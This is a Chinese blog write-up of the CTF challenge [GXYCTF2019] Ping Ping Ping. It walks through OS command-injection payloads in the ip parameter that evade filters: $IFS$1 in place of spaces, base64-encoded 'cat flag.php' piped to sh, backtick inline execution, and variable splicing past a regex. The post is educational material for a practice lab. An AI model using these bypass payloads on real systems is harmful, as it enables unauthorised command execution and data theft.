[GXYCTF2019]Ping Ping Ping(RCE)

最新推荐文章于 2024-06-06 16:58:38 发布
最新推荐文章于 2024-06-06 16:58:38 发布
阅读量7.4k 收藏 32
点赞数 15
分类专栏: buuctf_web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44348894/article/details/105352676
版权

这题考的比较全面:
在这里插入图片描述
随便ping一下:
在这里插入图片描述
正常request了,那跟我之前做的有一题应该差不多,直接payload:

?ip=127.0.0.1;cat%20/flag

在这里插入图片描述
应该是过滤了一些符号,那先试试payload:

?ip=127.0.0.1;ls

在这里插入图片描述
还好ls了一下,不然这不得cat半天?
试一下cat index:
在这里插入图片描述
过滤空格了,可以用${IFS}$代替:
在这里插入图片描述
可能也过滤了{},用$IFS$1代替:
payload:

?ip=127.0.0.1;cat$IFS$1index.php

在这里插入图片描述
一目了然过滤了啥,flag字眼也过滤了,bash也没了,不过sh没过滤:
payload:

?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

Y2F0IGZsYWcucGhw是cat flag.php的base64-encode

拿到flag:
在这里插入图片描述
这行payload不懂可以看一下这位师傅的小结:
https://www.ghtwf01.cn/index.php/archives/273/

然后又看了别人的wp,他们说有大佬payload:

?ip=127.0.0.1;cat$IFS$1`ls`

也可以拿到flag,这行payload他们解释说:

方法名叫内联执行
方法:将反引号内命令的输出作为输入执行

然后在F12下就全部ls出来了(0110 0110 0110):
在这里插入图片描述
还有一种说可以拼接,我没拼出来,我的payload:

?ip=127.0.0.1;a=fl;b=ag;cat$IFS$1$a$b.php

在这里插入图片描述
师傅的payload:

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

在这里插入图片描述
额,我裂开,然后我就查了一下:
在这里插入图片描述

有点模糊,动手都试一遍:

?ip=127.0.0.1;a=f;cat$IFS$1$alag.php    过滤
?ip=127.0.0.1;a=l;cat$IFS$1f$aag.php	有request,但没flag
?ip=127.0.0.1;a=a;cat$IFS$1fl$ag.php  	过滤
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php	有flag

太疑惑了叭,为什么!我问到了再回来加,你们有人知道也可以留言,感激不尽!

(两天后,论坛有人回复了)

if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");

匹配一个字符串中,是否按顺序出现过flag四个字母

这就解释了为什么我当初试a=fl;b=ag;会被过滤掉的原因。

k0f1i
关注
  • 15
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 15
    评论
专栏目录
[buuoj][GXYCTF2019]Ping Ping Ping
qq_42250840的博客
07-07 354
知识点: linux的命令执行 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些 执行系统命令的函数。如果用户可以控制命令执行函数中的参数时, 就可以注入一些恶意的系统命令到正常命令,造成命令执行漏洞 绕过空格、敏感字符、连接符 复现: 尝试?ip=127.0.0.1;ls 找到flag.php、index.php 尝试访问: ?ip=127.0.0.1 ;cat flag.php 空格被过滤, 1.%20(space)、%09(tab)、$IFS$9、 IFS、{IFS} 2.使用&l
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5058
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
BUUCTF——ping ping ping
weixin_62248541的博客
11-28 203
BUUCTF——ping ping ping
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 7879
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
CTF演练---ping
最新发布
2301_78637299的博客
06-06 444
CTF演练---ping--->只需要输入ip,就可以获取到你想要的
BUUCTF之Ping Ping Ping
金 帛的博客
02-20 6697
BUUCTFWP,关于一些waf的绕过
【BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
algae
08-29 9590
【BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换 0x00 考点 1、命令绕过空格方法有: $IFS$1、${IFS}$1、 {IFS}、IFS 2、内联执行 内联,就是将反引号内命令的输出作为输入执行 ?ip=127.0.0.1;cat$IFS$9`ls` $IFS在Li
BUUCTF刷题记录 Ping Ping Ping
m0_46576074的博客
05-16 1802
[GXYCTF2019]Ping Ping Ping 进入页面 然后/?ip=127.0.0.1|ls 进入 读取flag.php 再cat$IFS$1indnx.php 再变量拼接 ?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 转至 http://1d22a0a5-c6a0-43f1-8e52-e5a33ec7e044.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 再F12 ...
[GXYCTF2019]Ping Ping Ping
m0_56375816的博客
01-06 2474
观察页面 看到页面上没有什么输入点,只有一个/?Ip,题目又是ping,可能是ping地址,尝试把页面上的格式输入,再随便写一个地址,如/?ip=210.0.0.1 这与cmd中ping测试相似,但是真的pingping不通的,搜ip是有的,应该是一个开了禁ping的,方向应该是正确的。而且应该是假ping。 2.找文件 可以利用拼接命令,在/?ip=210.0.0.1后面用拼接符与查看命令连接起来 & 表示任务在后台执行,如要在后台运行redis-serv...
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
cve_2019_0708_bluekeep_rce.rb
09-07
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。...
phpstudy_rce.py
10-11
phpstudy_rce
fanwei_rce.py
10-11
泛微OA管理系统RCE漏洞利用脚本 使用方法 python3 rce.py http://URL
微信远程rce poc
04-18
微信远程rce poc
Apache-druid-kafka-rce.yaml
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
[GXYCTF2019]Ping Ping Ping (文件执行漏洞)
weixin_59233715的博客
12-13 1452
通过回显我们可以知道在当前目录有flag.php和index.php文件。管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)比如我们想执行 cat flag.php但对方过滤了flag字符串。前面的语句为假则直接出错,后面的也不执行,前面只能为真。这个的意思是匹配到按flag这个顺序的所有字符。这个的意思是匹配到按flag这个顺序的所有字符。1、命令联合执行(参考lunan0320)cat fla$a.php即可。当前面的执行出错时(为假)执行后面的。前面的执行完执行后面的。
CTF_Web_[GXYCTF2019]Ping Ping Ping
十二_的博客
07-26 1757
表示上一条命令执行失败后,才执行下一条命令,如catnofile||echo“fail”表示前一条命令执行成功时,才执行后一条命令,如echo'1‘&&echo‘2’表示管道,上一条命令的输出,作为下一条命令参数,如echo‘yes’|wc-l。发现没有任何新的回显,应该是因为前面是假ping,所以后面的命令不执行。如上图,“||”会有效果—显示了两个后缀为“php”的文件名.文件,或许我们要找的flag就在其中。根据大佬解题的思路,我们来找文件,进行测试。...
ctfhub RCE
08-18
CTFHub RCE(Remote Code Execution)是指在CTFHub平台上利用漏洞或安全问题,远程执行恶意代码或命令的攻击行为。这种攻击通常会利用软件或网站存在的漏洞,通过远程执行代码来获取非授权的访问权限或对系统进行控制。 请注意,RCE是一种非法的攻击行为,严重侵犯了他人的隐私和系统安全。在任何情况下,我都不能提供关于如何进行RCE攻击的具体指导或支持。如果您对CTFHub或其他相关安全问题有任何合法的疑问或需求,请提供更具体的信息,我将尽力帮助您。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值